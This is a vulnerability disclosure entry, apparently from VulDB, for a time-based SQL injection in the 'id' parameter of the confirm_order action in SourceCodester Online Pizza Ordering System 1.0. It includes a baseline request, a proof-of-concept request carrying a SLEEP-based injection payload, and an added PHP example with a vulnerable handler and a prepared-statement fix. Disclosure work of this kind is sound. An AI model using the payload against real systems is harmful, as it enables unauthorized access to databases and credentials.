Submission #216885: SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order' Information

Title: SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order'

Description:

Affected Software: SourceCodester Online Pizza Ordering System v1.0
https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html#comment-103391

Tested On: Ubuntu Server 22.04.3 LTS

Affected URL: http://x.x.x.x/php-opos/admin/ajax.php?action=confirm_order

Request:

POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx

id=1

Affected Parameter: id

Proof of Concept:

POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx

id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE)

Impact: An SQL injection vulnerability can result in unauthorized access to restricted data such as user information and credentials.

Summary: An authenticated remote SQL injection vulnerability exists in the SourceCodester Online Pizza Ordering System v1.0. The vulnerability is present in a POST request to the /admin/ajax.php?action=confirm_order page via the 'view order' functionality in /admin/index.php?page=orders. Due to improper input sanitization, a specially crafted packet that manipulates the 'id' parameter in the POST request leads to an SQL injection vulnerability, allowing malicious actors to view restricted data and extract the underlying database.
User: simon.davis8080 (UID 54983)
Submitted: October 5, 2023 10:30 (3 years ago)
Moderation: October 5, 2023 12:01 (2 hours later)
Status: Accepted
VulDB Entry: 241384 [SourceCodester Online Pizza Ordering System 1.0 ajax.php?action=confirm_order id SQL injection]
Points: 17
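For reference, the defect class the submission describes and the corresponding fix, as an added illustration that is not the project's own code: a hypothetical confirm_order handler that interpolates the POST parameter 'id' into the query, beside a version that validates 'id' as a positive integer and binds it through a mysqli prepared statement. The table and column names (orders, status) and the $conn handle are assumptions.

```php
<?php
// Added illustration, not code from the Online Pizza Ordering System.
// Assumed: a mysqli connection $conn, a table `orders` with columns `id` and `status`.

// Vulnerable shape: the raw POST value is concatenated into the SQL string, so
// anything after the number (operators, subqueries) is parsed by MySQL as SQL.
function confirm_order_vulnerable(mysqli $conn): bool
{
    $id  = $_POST['id'];
    $sql = "UPDATE orders SET status = 1 WHERE id = {$id}";
    return $conn->query($sql) !== false;
}

// Hardened shape: accept only a positive integer, log anything else so the
// attempt is visible to monitoring, and bind the value as a typed parameter
// so the database never treats request data as query text.
function confirm_order_fixed(mysqli $conn): bool
{
    $id = filter_var(
        $_POST['id'] ?? '',
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($id === false) {
        error_log('confirm_order: rejected non-integer id from ' . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
        http_response_code(400);
        return false;
    }

    $stmt = $conn->prepare("UPDATE orders SET status = 1 WHERE id = ?");
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('i', $id);       // 'i' forces an integer binding
    $ok = $stmt->execute() && $stmt->affected_rows === 1;
    $stmt->close();
    return $ok;
}
```

Because the endpoint is only reachable from the admin orders page, the validation and prepared statement belong alongside the existing admin session check, not in place of it.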